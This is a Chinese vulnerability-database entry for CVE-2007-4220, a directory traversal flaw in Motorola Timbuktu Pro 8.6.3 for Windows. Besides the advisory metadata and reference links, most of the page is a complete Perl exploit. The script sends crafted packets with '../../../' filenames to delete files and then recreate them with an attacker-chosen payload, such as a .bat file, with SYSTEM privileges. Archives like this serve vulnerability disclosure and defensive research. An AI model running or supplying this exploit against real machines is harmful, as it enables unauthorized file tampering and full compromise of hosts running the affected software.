Motorola Timbuktu Pro远程目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113523 漏洞类型 路径遍历
发布时间 2007-08-27 更新时间 2007-09-25
CVE编号 CVE-2007-4220 CNNVD-ID CNNVD-200708-463
漏洞平台 Windows CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/30532
https://www.securityfocus.com/bid/25453
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-463
|漏洞详情
Motorola的TimbuktuPro是一款远程控制软件,允许远程访问计算机桌面。Timbuktu在处理文件名和目录时存在漏洞,远程攻击者可能利用这些漏洞非授权访问文件。Timbuktu在处理Send请求时没有正确地检查目录遍历序列,如果在请求中包含了../../../之类序列的话,攻击者就可以向预期位置之外写入内容;此外,如果文件已存在的话,就会以新文件名创建文件,但如果在传输完成之前断开了连接,Timbuktu就会删除最初所指定的文件名。
|漏洞EXP
source: http://www.securityfocus.com/bid/25453/info

Motorola Timbuktu Pro is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to delete or create arbitrary files with SYSTEM-level privileges. This could completely compromise affected computers.

Timbuktu Pro 8.6.3.1367 for Windows is vulnerable; other versions and platforms may also be affected. 

#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
# Timbuktu Pro 8.6.3 Arbitrary File Deletion/Creation
#
# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
#
# Advisory: 
# 
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
#
# Copyright: (c)2007 BastardLabs
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
#
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
use IO::Socket;
use Time::HiRes qw(usleep);
##
## we start in the C:\Program Files\Timbuktu Pro\N1\ folder
##
$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
##
##payload can be either text or binary (in \x42\x69\x42 format)
##
$payload =~ s/\\x(..)/pack("C",hex($1))/egi;
##
## packet1 == .hello. packet
##
$packet1= 
"\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b".
"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d".
"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00";
$packet2= "\xff";
##
## packet3 == packet containing the filename (with directory traversal)
##
$packet3= 
"\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94".
"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00".
"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename 
;
$packet4= "\xf9\x00";
##
## packet5 == payload, the size of the payload is over 2 bytes
## so we have 65535 bytes of data to play with
##
$packet5= "\xf8" . pack("n",length($payload)) . $payload ;
$packet6= "\xf7";
$packet7= "\xfa";
$packet8= "\xfe";
##
##DELETE THE FILE (IF NECESSARY)
##
print "[+] Delete the file (if necessary)\n";
print "[+] Connecting...\n";
$remote = &connection("$ARGV[0]","$ARGV[1]");
print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
##
## we break the connection before it's completed (i.e before the \xfe)
##
close $remote;
##
##(RE)CREATE THE FILE
##
print "[+] (Re)Create the file with our content\n";
print "[+] Connecting...\n";
$remote = &connection("$ARGV[0]","$ARGV[1]");
print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000);
print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000);
print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000);
print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000);
print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000);
close $remote;
sub connection
{
local($dest,$port) = @_;
my $remote;
if (!$port or !dest) {
print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; }
else
{
$remote = IO::Socket::INET->new(
Proto => tcp,
PeerAddr => $dest,
PeerPort => $port,
Timeout => 1) or print "[-] Error: Could not establish a
connection to $dest:$port\n" and exit;
return $remote;
}
}
sub promptUser {
local($promptString,$defaultValue) = @_;
if ($defaultValue) {
print $promptString, "[", $defaultValue, "]: ";
} else {
print $promptString, ": ";
}
$| = 1; # force a flush after our print
$_ = <STDIN>; # get the input from STDIN
chomp;
if ("$defaultValue") {
return $_ ? $_ : $defaultValue; # return $_ if it has a value
} else {
return $_;
}
}
|受影响的产品
Motorola Timbuktu Pro for Windows 8.6.3 .1367
|参考资料

来源:BID
名称:25453
链接:http://www.securityfocus.com/bid/25453
来源:IDEFENSE
名称:20070827MotorolaTimbuktuProDirectoryTraversalVulnerability
链接:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=589
来源:SECUNIA
名称:26588
链接:http://secunia.com/advisories/26588
来源:ftp-xo.netopia.com
链接:ftp://ftp-xo.netopia.com/evaluation/docs/timbuktu/win/865/relnotes/TB2Win865Evalrn.pdf
来源:XF
名称:timbuktu-send-directory-traversal(36273)
链接:http://xforce.iss.net/xforce/xfdb/36273
来源:SECTRACK
名称:1018614
链接:http://www.securitytracker.com/id?1018614
来源:VUPEN
名称:ADV-2007-2990
链接:http://www.frsirt.com/english/advisories/2007/2990